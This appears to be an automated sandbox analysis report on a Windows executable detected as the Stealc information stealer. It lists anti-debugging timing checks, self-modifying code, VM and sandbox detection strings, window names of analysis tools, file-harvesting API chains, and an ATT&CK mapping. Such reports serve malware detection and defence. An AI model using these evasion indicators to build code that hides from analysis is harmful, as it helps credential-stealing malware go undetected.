                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CA5C7 second address: 9CA5CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA003F second address: AA0048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA0048 second address: AA004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA004E second address: AA006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Eh 0x00000007 jmp 00007F2429065B4Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA654C second address: AA658B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F242906E926h 0x0000000b pop eax 0x0000000c pushad 0x0000000d jl 00007F242906E926h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 jmp 00007F242906E932h 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push ecx 0x00000020 pushad 0x00000021 jmp 00007F242906E92Fh 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAADEC second address: AAADF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2429065B46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAADF6 second address: AAADFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAADFA second address: AAAE00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAABF8 second address: AAAC1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F242906E937h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAC1A second address: AAAC20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAC20 second address: AAAC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAC2C second address: AAAC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5579 second address: 9C5581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C5581 second address: 9C55C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2429065B55h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d jmp 00007F2429065B53h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F2429065B4Bh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C55C2 second address: 9C55C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2522 second address: AB2526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2526 second address: AB2532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F242906E926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB283B second address: AB285E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push edx 0x00000008 jnp 00007F2429065B46h 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2429065B4Ah 0x00000018 jnc 00007F2429065B46h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB29BD second address: AB29C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB29C1 second address: AB29CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB29CD second address: AB29D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB29D1 second address: AB29EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2C63 second address: AB2C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F242906E926h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2C6F second address: AB2C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2DF7 second address: AB2E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F242906E92Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2E0E second address: AB2E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC515E second address: AC518C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F242906E92Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F242906E937h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC518C second address: AC5196 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2429065B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC5196 second address: AC519D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AC4FC6 second address: AC4FE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2429065B4Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9825 second address: AE982F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F242906E926h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE892C second address: AE8945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F2429065B4Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8945 second address: AE8950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F242906E926h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8C18 second address: AE8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE8C1C second address: AE8C38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F242906E935h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE9090 second address: AE90B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F2429065B4Ah 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push edx 0x00000014 jp 00007F2429065B46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AED7F1 second address: AED7F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDB21 second address: AEDB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEDB26 second address: AEDB2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51402B8 second address: 51402D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2429065B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, ADEEh 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51402D4 second address: 5140360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F242906E92Eh 0x00000009 and esi, 1D8C6638h 0x0000000f jmp 00007F242906E92Bh 0x00000014 popfd 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F242906E935h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F242906E92Eh 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 jmp 00007F242906E92Eh 0x0000002e pushfd 0x0000002f jmp 00007F242906E932h 0x00000034 add esi, 11772228h 0x0000003a jmp 00007F242906E92Bh 0x0000003f popfd 0x00000040 popad 0x00000041 pop ebp 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140360 second address: 5140364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140364 second address: 514036A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514036A second address: 5140370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403BD second address: 51403C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403C1 second address: 51403E0 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 0B25FD73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov ecx, 1E11A7EBh 0x00000011 movzx eax, bx 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ah, F8h 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dx, 2BB6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403E0 second address: 51403EF instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx ecx, dx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403EF second address: 51403F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51403F3 second address: 514040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cl, bh 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 7231h 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514040D second address: 5140411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140411 second address: 5140417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5140417 second address: 514041D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514041D second address: 5140421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A07E36 second address: A07E48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2429065B4Ah 0x0000000d rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8518AF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FE0E3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9FCCA1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A265EF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A03ACC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A86ECC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006038B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00604910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_005FDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_005FE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00604570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00604570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_005FED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_005FBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005F16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00603EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00603EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF68A FindFirstFileA,0_2_005FF68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_005FF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F1160 GetSystemInfo,ExitProcess,0_2_005F1160
                Source: file.exe, file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware>.%H
                Source: file.exe, 00000000.00000002.2067248972.0000000001433000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp^F
                Source: file.exe, 00000000.00000002.2067248972.0000000001463000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13408
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13420
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13405
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13428
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13460
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F45C0 VirtualProtect ?,00000004,00000100,000000000_2_005F45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00609860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609750 mov eax, dword ptr fs:[00000030h]0_2_00609750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00607850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00609600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00609600
                Source: file.exe, file.exe, 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00607B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00606920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00606920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00607850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00607A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00607A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.5f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2067248972.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2023298984.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 616, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
